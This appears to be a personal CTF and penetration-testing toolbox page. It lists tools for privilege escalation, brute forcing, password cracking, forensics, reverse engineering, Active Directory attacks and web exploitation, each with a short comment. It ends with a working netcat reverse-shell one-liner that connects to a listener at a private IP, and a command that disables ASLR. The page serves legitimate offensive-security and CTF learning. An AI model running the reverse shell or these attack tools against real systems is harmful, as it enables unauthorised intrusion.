Privesc

• GTFObins : List of UNIX binaries than can be used to leverage privileges escalation.
• linPEAS : Automatically scan an Unix system for vulnerabilities than can lead to privesc.
• LinEnum
• LES (Linux Exploit Suggester)
• Linux Smart Enumeration
• Linux Priv Checker

Manipulate pcap and pcapng files with Python

• Scapy : Very powerful but steep learning curve, can be used for both static analysis and realtime packet manipulation.
• dpkt : Quick setup and fast but not many features, accessing nested packet contents can be cumbersome.
• pyshark : Python wrapper for tshark, which allows the use of Wireshark Dissectors.
• pypacker : Built on top of dpkt, fast as well but doesn’t do anything the other don’t.

Bruteforce web app subdomains, files and directories

• gobuster : Written in Go, can also find host names.
• dirb : Kali’s version
• dirbuster : OWASP’s version (can also bruteforce letter by letter)
• afl++ : Not a bruteforce tool but an awesome fuzzer

Exploitation

• The whole Metasploit framework, of course
• But especially msfvenom, their payload generator (which replaced both msfpayload and msfencode)
• Searchsploit from exploit-db, quite handy

Package management

• FPM : Easy and fast method to create and tweak packages for a huge variety of systems
• Poetry : An elegant python package creator and manager

Password crackers

• john : Does it really need an introduction ?
• hydra : My personal preference
• fcrackzip : A cool tool but hydra is usually faster

Cryptography

• SageMath : Mathematical computation with a Python API
• z3 : Theorem prover from Microsoft, has Python, C and C++ API
• Alpertron : Easily factorize big integers online
• RsaCtfTools : Amounts for 95% of my flags in the crypto category

Webhooks and HTTP requests

• RequestBin : Online HTTP/Webhook requests collector when whipping up a full-fledged C2 would be overkill.

GDB enhancements

• GEF : Single file and fast.
• PwnDBG : Setup is quite cumbersome when on a hurry but there’s a bootload of features and extensions available.
• peda : Single file with a lib folder, quite easy to c/p on a remote target when needed. Not actively maintained but still working very well.

Online services

• CyberChef : Great and intuitive UI for manipulating data, files and ciphers. All online but can be run locally if needed.
• ngrok : Expose your LAN to the outside for quick C2 or file serving.

Forensics

• Wireshark : The uncontested king of packet analysis
• A really complete cheatsheet
• Photorec : Recovers 180+ file types from a disk
• Binwalk : Extract firmware images and files
• Sleuthkit : Collection of utilities for FS analysis.
• Autopsy : Graphical interface for the sleuth kit.
• Bulk Extractor : Extract whatever you can from an image. Not so subtle, but oh so efficient.
• Volatility : The best tool to analyze memory dumps. Sometimes finicky, will need some plugins to give its all.
  • Dwarf2json : Must-have for Vol3 users to generate a profile for the target system

Other awesome Python packages and scripts

• Pwntools : Awesome utils and functions for all matters of binary exploitation.
• DNSsteal : Fake DNS server for data exfiltration through DNS requests
• pspy : Monitor system processes without root access

Reverse engineering

• Ghidra : The NSA decompiler/disassembler
  • A must-have plugin : ghidra-dark
• Cutter : FOSS wrapper for Rizin
  • Good decompiler with the r2ghidra plugin
• radare2 : Super powerful but cryptic as fuck
  • Also benefits from r2ghidra
• ghex : A nice hexditor for Gnome/Mate DM

libc database search

• Blukat : Get libc version for building ROPs

Automated tools

• nmap : The one and only
• WPscan : When you’re willing to shoot the ambulance
• SQLmap : Because no one wants to do it by hand

Windows / Active Directory tools

• mimikatz : Exploitation and post-exploitation made easy
• Evil-WinRM : An incredible remote shell (provided you pwned the system already, of course)
• impacket : Not specifically windows-oriented but can be used to communicate with almost all protocols MS uses
• SMBmap : Enumerate samba shares across an entire domain
• SMBclient : For when SMBmap finishes
• Bloodhound : Find uninteded relationships to exploit in an AD environment

Web exploitation

• Burp Suite : The best proxy around for Web exploits
• Owasp ZAP : A good contender to Burp
• Nikto2 : Automated and comprehensive web scanner
• BeEF framework : Complete control over an unlucky browser

OS

• Kali Linux : Industry standard.
• Parrot OS : Also Debian based, it’s my favorite atm. A bit less lightweight but really stylish and with the same quality of tools.
• BlackArch : My friend (who uses Arch, btw) only swears by it. Didn’t try by myself, though.
• FlareVM : From FireEye, godlike for Windows malware analysis

Useful bash commands

Netcat reverse shell without -e argument (from reverse shell cheatsheet)

• From attacker : nc -nlvp 4567
• From target : rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.0.12 4567 > /tmp/f

Start a shell without ASLR if you don’t wanna mess with /proc/sys/kernel/randomize_va_space

setarch `uname -m` -R /bin/bash